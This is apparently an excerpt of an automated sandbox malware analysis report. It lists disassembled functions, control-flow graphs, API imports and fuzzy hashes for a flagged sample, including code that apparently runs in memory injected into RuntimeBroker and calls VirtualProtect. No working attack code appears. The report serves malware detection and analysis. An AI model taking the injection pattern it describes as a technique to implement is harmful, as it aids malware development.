                                                    • Opcode ID: 2e99d3806bb1f5b3d0ff0c945178925e562c3c7a06867b70d4d84469f2ffba43
                                                    • Instruction ID: 4875918be15a97626bae6040a34152555a74c5604e8b9e0ce4185178829f14d3
                                                    • Opcode Fuzzy Hash: 2e99d3806bb1f5b3d0ff0c945178925e562c3c7a06867b70d4d84469f2ffba43
                                                    • Instruction Fuzzy Hash: AE818D32B18A4199EB00DF69D4902AC37B4FB48B68F581236DF5DA3B99DF38D598C310
                                                    Function 00007FF651792E60 Relevance: 10.6, APIs: 7, Instructions: 71COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4613468560.00007FF651791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF651790000, based on PE: true
                                                    • Associated: 00000000.00000002.4613413590.00007FF651790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.4613516419.00007FF651795000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.4613548696.00007FF651798000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.4613583934.00007FF651799000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff651790000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Lockit@std@@$??0_??1_Bid@locale@std@@Concurrency::cancel_current_taskFacet_Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterV42@@Vfacet@locale@2@std::_
                                                    • String ID:
                                                    • API String ID: 762505753-0
                                                    • Opcode ID: 4534c48d6121e506176395aa0da307aa7327604ad8d467125341fd00de69631c
                                                    • Instruction ID: c69bd7f68d94ac67eb76d93672902e6152822779defa1a7e6584270d8dd5ba2b
                                                    • Opcode Fuzzy Hash: 4534c48d6121e506176395aa0da307aa7327604ad8d467125341fd00de69631c
                                                    • Instruction Fuzzy Hash: 3E315472A08B4591EB149F19E4641697360FB88F94F4C0632EB9EA77AEDF3CE459C700
                                                    Function 00007FF651792840 Relevance: 9.2, APIs: 6, Instructions: 153COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 266 7ff651792840-7ff65179286a 267 7ff651792870-7ff651792878 266->267 267->267 268 7ff65179287a-7ff651792887 267->268 269 7ff651792974-7ff651792979 call 7ff6517912e0 268->269 270 7ff65179288d-7ff651792896 268->270 279 7ff65179297a-7ff651792991 call 7ff651791240 269->279 271 7ff651792898-7ff6517928b4 memmove 270->271 272 7ff6517928b9-7ff6517928c3 270->272 274 7ff651792960-7ff651792973 271->274 275 7ff651792904-7ff651792924 272->275 276 7ff6517928c5-7ff6517928cf 272->276 278 7ff651792926-7ff651792929 275->278 275->279 280 7ff6517928d3-7ff6517928da 276->280 278->280 281 7ff65179292b-7ff65179292e 278->281 289 7ff6517929bf-7ff6517929d7 279->289 290 7ff651792993-7ff6517929a0 279->290 282 7ff651792937-7ff65179293c call 7ff651793340 280->282 283 7ff6517928dc-7ff6517928e3 280->283 285 7ff65179293f-7ff65179295b memmove 281->285 282->285 283->279 287 7ff6517928e9-7ff6517928f4 call 7ff651793340 283->287 285->274 296 7ff651792930-7ff651792936 _invalid_parameter_noinfo_noreturn 287->296 297 7ff6517928f6-7ff651792902 287->297 293 7ff6517929a2-7ff6517929b5 290->293 294 7ff6517929ba call 7ff6517935bc 290->294 298 7ff6517929b7 293->298 299 7ff6517929d8-7ff651792a01 _invalid_parameter_noinfo_noreturn 293->299 294->289 296->282 297->285 298->294 301 7ff651792a30-7ff651792a34 299->301 302 7ff651792a03-7ff651792a0e 299->302 304 7ff651792a3e-7ff651792a4c ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAA@XZ 301->304 305 7ff651792a36-7ff651792a39 call 7ff651792ba0 301->305 302->301 303 7ff651792a10-7ff651792a2e 302->303 303->301 307 7ff651792a4e-7ff651792a56 call 7ff6517935bc 304->307 308 7ff651792a5b-7ff651792a68 304->308 305->304 307->308
                                                    APIs
                                                    • memmove.VCRUNTIME140(?,?,?,00007FF651791015), ref: 00007FF6517928AA
                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF651791015), ref: 00007FF651792930
                                                    • memmove.VCRUNTIME140(?,?,?,00007FF651791015), ref: 00007FF651792956
                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF65179297A
                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,00007FF651791015), ref: 00007FF6517929D8
                                                    • ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140 ref: 00007FF651792A41
                                                      • Part of subcall function 00007FF651793340: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,0000000100000000,00007FF65179293C,?,?,?,00007FF651791015), ref: 00007FF65179335A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4613468560.00007FF651791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF651790000, based on PE: true
                                                    • Associated: 00000000.00000002.4613413590.00007FF651790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.4613516419.00007FF651795000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.4613548696.00007FF651798000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.4613583934.00007FF651799000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff651790000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo_noreturnmemmove$??1?$basic_streambuf@Concurrency::cancel_current_taskD@std@@@std@@U?$char_traits@malloc
                                                    • String ID:
                                                    • API String ID: 4151065855-0
                                                    • Opcode ID: 061e06aae32766b36eb5e371fb9f0ada9feb0741a7736276d232d951b532adef
                                                    • Instruction ID: bcdf2a91c3494de5b310c0d4e0b9174bbdb1cc50204ce345f03049e229af28a3
                                                    • Opcode Fuzzy Hash: 061e06aae32766b36eb5e371fb9f0ada9feb0741a7736276d232d951b532adef
                                                    • Instruction Fuzzy Hash: 3F51E162B0974581EB14AB29E46437C22A4EB05FF4F684731DA7DA73DADF3CD48A8300
                                                    Function 00007FF6517930E0 Relevance: 9.1, APIs: 6, Instructions: 135COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4613468560.00007FF651791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF651790000, based on PE: true
                                                    • Associated: 00000000.00000002.4613413590.00007FF651790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.4613516419.00007FF651795000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.4613548696.00007FF651798000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.4613583934.00007FF651799000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff651790000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                    • String ID:
                                                    • API String ID: 2016347663-0
                                                    • Opcode ID: fc0a6e5bffcc4cd51f555edc60534f8265a9eb00ebb660565df8606e8137ac2e
                                                    • Instruction ID: a82c1fbbbc1792f007c22357a6cd4554199ccc0bce8a630ec491707e68a35d0f
                                                    • Opcode Fuzzy Hash: fc0a6e5bffcc4cd51f555edc60534f8265a9eb00ebb660565df8606e8137ac2e
                                                    • Instruction Fuzzy Hash: 8A41A262B18A4191EF10DB2AE5286BD6361EB44FE0F584732DE6D97BDADE3CD049C304
                                                    Function 00007FF651792F70 Relevance: 6.1, APIs: 4, Instructions: 115COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4613468560.00007FF651791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF651790000, based on PE: true
                                                    • Associated: 00000000.00000002.4613413590.00007FF651790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.4613516419.00007FF651795000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.4613548696.00007FF651798000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.4613583934.00007FF651799000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff651790000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                    • String ID:
                                                    • API String ID: 2016347663-0
                                                    • Opcode ID: 022bf48b0be6360237c50bed30530884a305a30fd38d806b1d6d9e03fd545b1d
                                                    • Instruction ID: 27221ade752dc7086922b364e635b6d24aecbf94b0d8e283a8f0eb50790ee2b2
                                                    • Opcode Fuzzy Hash: 022bf48b0be6360237c50bed30530884a305a30fd38d806b1d6d9e03fd545b1d
                                                    • Instruction Fuzzy Hash: 2631F021B0868194EF149F3EA65476D6362EB04FE0F584235DAAD97BCEDE3CE059C300
                                                    Function 00007FF651792560 Relevance: 6.1, APIs: 4, Instructions: 110COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4613468560.00007FF651791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF651790000, based on PE: true
                                                    • Associated: 00000000.00000002.4613413590.00007FF651790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.4613516419.00007FF651795000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.4613548696.00007FF651798000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.4613583934.00007FF651799000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff651790000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c9d034aa6b88396eae2df4aade8b45d2a44d5a469a2b1ac91a975ef6a8dadbee
                                                    • Instruction ID: 17d863296a818fb28884febc5a4a1096e8e00ea34215ddcf2218550a307ae349
                                                    • Opcode Fuzzy Hash: c9d034aa6b88396eae2df4aade8b45d2a44d5a469a2b1ac91a975ef6a8dadbee
                                                    • Instruction Fuzzy Hash: 31517132608B8185DB108F2DE4603ADB3A4FB84B94F584236DA9D97BADDF3CC448C740

                                                    Execution Graph

                                                    Execution Coverage:18.3%
                                                    Dynamic/Decrypted Code Coverage:100%
                                                    Signature Coverage:0%
                                                    Total number of Nodes:3
                                                    Total number of Limit Nodes:0
                                                    execution_graph 2530 7ffd34777fbd 2531 7ffd34777fcb VirtualProtect 2530->2531 2533 7ffd347780ab 2531->2533

                                                    Executed Functions

                                                    Function 00007FFD34770498 Relevance: 4.1, Strings: 3, Instructions: 371COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 0 7ffd34770498 1 7ffd3477049d-7ffd3477050e 0->1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.4616695677.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ffd34770000_RuntimeBroker.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: O_^2$O_^;$O_^D
                                                    • API String ID: 0-1588794792
                                                    • Opcode ID: a949e8dd27fced4ffa256a4959919ec35c6c69d91597f1b0af7e4ad49d9f7b0a
                                                    • Instruction ID: ff6b72b203469a46ac0912c1f58a1e58dc4d17f896dd941c22f25cd1c9da243f
                                                    • Opcode Fuzzy Hash: a949e8dd27fced4ffa256a4959919ec35c6c69d91597f1b0af7e4ad49d9f7b0a
                                                    • Instruction Fuzzy Hash: CCB19797B0D9D26BE621B3BD68B61FE3F84DF8323D74841B7D18CD9093DC08645A8296
                                                    Function 00007FFD347704B8 Relevance: 4.1, Strings: 3, Instructions: 356COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 14 7ffd347704b8 15 7ffd347704bd-7ffd3477050e 14->15
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.4616695677.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ffd34770000_RuntimeBroker.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: O_^2$O_^;$O_^D
                                                    • API String ID: 0-1588794792
                                                    • Opcode ID: bc6e6e0d9f1256c483c3b60e9ae2e279a8cb7b16b5621dda30c90fc2c248de73
                                                    • Instruction ID: f124b2de91e7d3ff9c5f9e0c70c6c0425087e4eb6450cae8472894f259548941
                                                    • Opcode Fuzzy Hash: bc6e6e0d9f1256c483c3b60e9ae2e279a8cb7b16b5621dda30c90fc2c248de73
                                                    • Instruction Fuzzy Hash: 40B19997B0D9D26BE621B3BD68B61FE3F84DF8323974841B7D1CCD9093DC08645A8295
                                                    Function 00007FFD34770530 Relevance: 4.1, Strings: 3, Instructions: 301COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 24 7ffd34770530 25 7ffd34770535-7ffd3477053e 24->25
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.4616695677.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ffd34770000_RuntimeBroker.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: O_^2$O_^;$O_^D
                                                    • API String ID: 0-1588794792
                                                    • Opcode ID: 881c10ede67154e54113404ceed2c6371271f375660a0274d87b33dc4e073bcf
                                                    • Instruction ID: 5dcc79e673d783581eea5144d416f19aec45ae3d9e2eb54e199eba9f943ec326
                                                    • Opcode Fuzzy Hash: 881c10ede67154e54113404ceed2c6371271f375660a0274d87b33dc4e073bcf
                                                    • Instruction Fuzzy Hash: 7C91C997B0D9D26BE621B3BD68B61FE3F84DF8323974841B7D1CCD9093DC08645A8295
                                                    Function 00007FFD34770670 Relevance: 3.9, Strings: 3, Instructions: 153COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 27 7ffd34770670-7ffd34771313 call 7ffd347707c0 55 7ffd34771318-7ffd34771330 27->55 56 7ffd34771331 55->56 56->56
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.4616695677.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ffd34770000_RuntimeBroker.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: O_^2$O_^;$O_^D
                                                    • API String ID: 0-1588794792
                                                    • Opcode ID: fb64f9719a1c969cb48e8da406db2d600f7184f515a988992424db6fa93f7648
                                                    • Instruction ID: 6d94760af954cb65a61be1889f0f49a8951a842681782254ef9d52034af90c36
                                                    • Opcode Fuzzy Hash: fb64f9719a1c969cb48e8da406db2d600f7184f515a988992424db6fa93f7648
                                                    • Instruction Fuzzy Hash: 1C41B9A3A0D6C55FE761E67C58BA1FA3FC4DF5322874800FAC08DDA183EC4864569386
                                                    Function 00007FFD34770600 Relevance: 1.8, Strings: 1, Instructions: 582COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 73 7ffd34770600-7ffd347783c2 81 7ffd34778601-7ffd34778642 call 7ffd34777840 73->81 82 7ffd347783c8-7ffd3477844e 73->82 90 7ffd34778644-7ffd34778655 81->90 91 7ffd34778657-7ffd34778660 81->91 105 7ffd3477844f-7ffd3477846d 82->105 94 7ffd34778668-7ffd34778684 90->94 91->94 100 7ffd34778699-7ffd3477869e 94->100 101 7ffd34778686-7ffd34778697 94->101 104 7ffd347786a5-7ffd3477870b call 7ffd34777850 call 7ffd34777860 100->104 101->104 126 7ffd34778792 104->126 127 7ffd34778711-7ffd3477875d 104->127 113 7ffd34778533 105->113 114 7ffd34778473-7ffd347784ad 105->114 116 7ffd34778538-7ffd3477855f 113->116 114->105 122 7ffd347784af-7ffd34778520 114->122 136 7ffd34778561-7ffd3477856f 116->136 122->113 159 7ffd34778522-7ffd3477852d 122->159 131 7ffd34778797-7ffd347787bf 126->131 127->126 153 7ffd3477875f-7ffd3477878b 127->153 154 7ffd347787c1-7ffd347787d8 call 7ffd34778b55 131->154 141 7ffd34778571-7ffd3477858b 136->141 142 7ffd347785e5-7ffd347785fc 136->142 150 7ffd34778591-7ffd347785ac 141->150 151 7ffd347787d9-7ffd347787ea 141->151 142->151 156 7ffd347785b4-7ffd347785c5 150->156 162 7ffd34778b11-7ffd34778b24 151->162 163 7ffd347787f0-7ffd347788de call 7ffd34777870 call 7ffd34777880 151->163 153->131 161 7ffd3477878d-7ffd34778790 153->161 154->151 168 7ffd347785cc-7ffd347785de 156->168 169 7ffd347785c7 156->169 159->116 164 7ffd3477852f-7ffd34778531 159->164 161->154 163->113 186 7ffd347788e4-7ffd347788fe 163->186 164->136 168->150 173 7ffd347785e0 168->173 169->151 173->151 187 7ffd34778904-7ffd34778964 call 7ffd34777830 call 7ffd34770628 186->187
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.4616695677.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ffd34770000_RuntimeBroker.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ,
                                                    • API String ID: 0-3772416878
                                                    • Opcode ID: f82289c6b82892f114bd39858939fad171493d3a6d8bd266d4e184ae876146b9
                                                    • Instruction ID: e25488a1ffa20ebb05ec3724d82cae318552f2d39864055c33000a0fccc08c1f
                                                    • Opcode Fuzzy Hash: f82289c6b82892f114bd39858939fad171493d3a6d8bd266d4e184ae876146b9
                                                    • Instruction Fuzzy Hash: 8712C471B1890A8FEB98EB6CC4A56B977E2FF99300F544579D14EC3292DE78B8418780
                                                    Function 00007FFD347759A6 Relevance: .5, Instructions: 474COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 567 7ffd347759a6-7ffd347759b3 568 7ffd347759be-7ffd34775a87 567->568 569 7ffd347759b5-7ffd347759bd 567->569 573 7ffd34775af3 568->573 574 7ffd34775a89-7ffd34775a92 568->574 569->568 575 7ffd34775af5-7ffd34775b1a 573->575 574->573 576 7ffd34775a94-7ffd34775aa0 574->576 582 7ffd34775b1c-7ffd34775b25 575->582 583 7ffd34775b86 575->583 577 7ffd34775aa2-7ffd34775ab4 576->577 578 7ffd34775ad9-7ffd34775af1 576->578 580 7ffd34775ab8-7ffd34775acb 577->580 581 7ffd34775ab6 577->581 578->575 580->580 584 7ffd34775acd-7ffd34775ad5 580->584 581->580 582->583 585 7ffd34775b27-7ffd34775b33 582->585 586 7ffd34775b88-7ffd34775c30 583->586 584->578 587 7ffd34775b6c-7ffd34775b84 585->587 588 7ffd34775b35-7ffd34775b47 585->588 597 7ffd34775c32-7ffd34775c3c 586->597 598 7ffd34775c9e 586->598 587->586 589 7ffd34775b4b-7ffd34775b5e 588->589 590 7ffd34775b49 588->590 589->589 592 7ffd34775b60-7ffd34775b68 589->592 590->589 592->587 597->598 599 7ffd34775c3e-7ffd34775c4b 597->599 600 7ffd34775ca0-7ffd34775cc9 598->600 601 7ffd34775c84-7ffd34775c9c 599->601 602 7ffd34775c4d-7ffd34775c5f 599->602 607 7ffd34775d33 600->607 608 7ffd34775ccb-7ffd34775cd6 600->608 601->600 603 7ffd34775c63-7ffd34775c76 602->603 604 7ffd34775c61 602->604 603->603 606 7ffd34775c78-7ffd34775c80 603->606 604->603 606->601 610 7ffd34775d35-7ffd34775dc6 607->610 608->607 609 7ffd34775cd8-7ffd34775ce6 608->609 611 7ffd34775d1f-7ffd34775d31 609->611 612 7ffd34775ce8-7ffd34775cfa 609->612 618 7ffd34775dcc-7ffd34775ddb 610->618 611->610 613 7ffd34775cfe-7ffd34775d11 612->613 614 7ffd34775cfc 612->614 613->613 616 7ffd34775d13-7ffd34775d1b 613->616 614->613 616->611 619 7ffd34775de3-7ffd34775e48 call 7ffd34775e64 618->619 620 7ffd34775ddd 618->620 627 7ffd34775e4f-7ffd34775e63 619->627 628 7ffd34775e4a 619->628 620->619 628->627
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.4616695677.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ffd34770000_RuntimeBroker.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2a8ec1cff9bf08303fb5973fa625f122e9d36cddd9da7d3ec1af747c6370b6e5
                                                    • Instruction ID: c9560f1cd32ee9875110fbf4fc6a3f90df500b93ed09faf2df21b8072d2330ee
                                                    • Opcode Fuzzy Hash: 2a8ec1cff9bf08303fb5973fa625f122e9d36cddd9da7d3ec1af747c6370b6e5
                                                    • Instruction Fuzzy Hash: C9F1A670608A4E8FEBA8DF28C8957F93BD1FF55310F44826EE84DC7691CB78A9458781
                                                    Function 00007FFD34776752 Relevance: .5, Instructions: 460COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 629 7ffd34776752-7ffd3477675f 630 7ffd34776761-7ffd34776769 629->630 631 7ffd3477676a-7ffd34776837 629->631 630->631 635 7ffd347768a3 631->635 636 7ffd34776839-7ffd34776842 631->636 637 7ffd347768a5-7ffd347768ca 635->637 636->635 638 7ffd34776844-7ffd34776850 636->638 644 7ffd347768cc-7ffd347768d5 637->644 645 7ffd34776936 637->645 639 7ffd34776852-7ffd34776864 638->639 640 7ffd34776889-7ffd347768a1 638->640 642 7ffd34776868-7ffd3477687b 639->642 643 7ffd34776866 639->643 640->637 642->642 646 7ffd3477687d-7ffd34776885 642->646 643->642 644->645 647 7ffd347768d7-7ffd347768e3 644->647 648 7ffd34776938-7ffd3477695d 645->648 646->640 649 7ffd3477691c-7ffd34776934 647->649 650 7ffd347768e5-7ffd347768f7 647->650 655 7ffd3477695f-7ffd34776969 648->655 656 7ffd347769cb 648->656 649->648 651 7ffd347768fb-7ffd3477690e 650->651 652 7ffd347768f9 650->652 651->651 654 7ffd34776910-7ffd34776918 651->654 652->651 654->649 655->656 658 7ffd3477696b-7ffd34776978 655->658 657 7ffd347769cd-7ffd347769fb 656->657 665 7ffd347769fd-7ffd34776a08 657->665 666 7ffd34776a6b 657->666 659 7ffd347769b1-7ffd347769c9 658->659 660 7ffd3477697a-7ffd3477698c 658->660 659->657 661 7ffd34776990-7ffd347769a3 660->661 662 7ffd3477698e 660->662 661->661 664 7ffd347769a5-7ffd347769ad 661->664 662->661 664->659 665->666 668 7ffd34776a0a-7ffd34776a18 665->668 667 7ffd34776a6d-7ffd34776b45 666->667 678 7ffd34776b4b-7ffd34776b5a 667->678 669 7ffd34776a51-7ffd34776a69 668->669 670 7ffd34776a1a-7ffd34776a2c 668->670 669->667 672 7ffd34776a30-7ffd34776a43 670->672 673 7ffd34776a2e 670->673 672->672 675 7ffd34776a45-7ffd34776a4d 672->675 673->672 675->669 679 7ffd34776b62-7ffd34776bc4 call 7ffd34776be0 678->679 680 7ffd34776b5c 678->680 687 7ffd34776bcb-7ffd34776bdf 679->687 688 7ffd34776bc6 679->688 680->679 688->687
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.4616695677.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ffd34770000_RuntimeBroker.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c4d0a39d88d4b33a67576dc10f5039de6ccc6f89f709158c367ae3a58dff8ae2
                                                    • Instruction ID: 45a5b68ee2545f534ef61581bdb4778f0b129bd9361b3d7d9daae22277c7f372
                                                    • Opcode Fuzzy Hash: c4d0a39d88d4b33a67576dc10f5039de6ccc6f89f709158c367ae3a58dff8ae2
                                                    • Instruction Fuzzy Hash: B1E1B470A08A4D8FEBA8DF28C8657F97BD1EF55310F54826ED84DC7295CE78A8448BC1
                                                    Function 00007FFD34777FBD Relevance: 1.6, APIs: 1, Instructions: 142memoryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 195 7ffd34777fbd-7ffd34777fc9 196 7ffd34777fd4-7ffd34777fe3 195->196 197 7ffd34777fcb-7ffd34777fd3 195->197 198 7ffd34777fee-7ffd34777ff9 196->198 199 7ffd34777fe5-7ffd34777fed 196->199 197->196 200 7ffd34777ffb-7ffd34778079 198->200 201 7ffd3477807a-7ffd347780a9 VirtualProtect 198->201 199->198 200->201 203 7ffd347780b1-7ffd347780d9 201->203 204 7ffd347780ab 201->204 204->203
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.4616695677.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ffd34770000_RuntimeBroker.jbxd
                                                    Similarity
                                                    • API ID: ProtectVirtual
                                                    • String ID:
                                                    • API String ID: 544645111-0
                                                    • Opcode ID: 1939c90f3a6584f3f0e783bc4029d80350b73912bd0555d94d493c719f45791d
                                                    • Instruction ID: 7cfd5671d958888a829ad94fcd1dccbda59c3ba18dd41148b580c94c7d876a80
                                                    • Opcode Fuzzy Hash: 1939c90f3a6584f3f0e783bc4029d80350b73912bd0555d94d493c719f45791d
                                                    • Instruction Fuzzy Hash: 8B41E73190C7888FDB199B689C566EDBFE0EF97321F0442AFD049D3192CA786816C792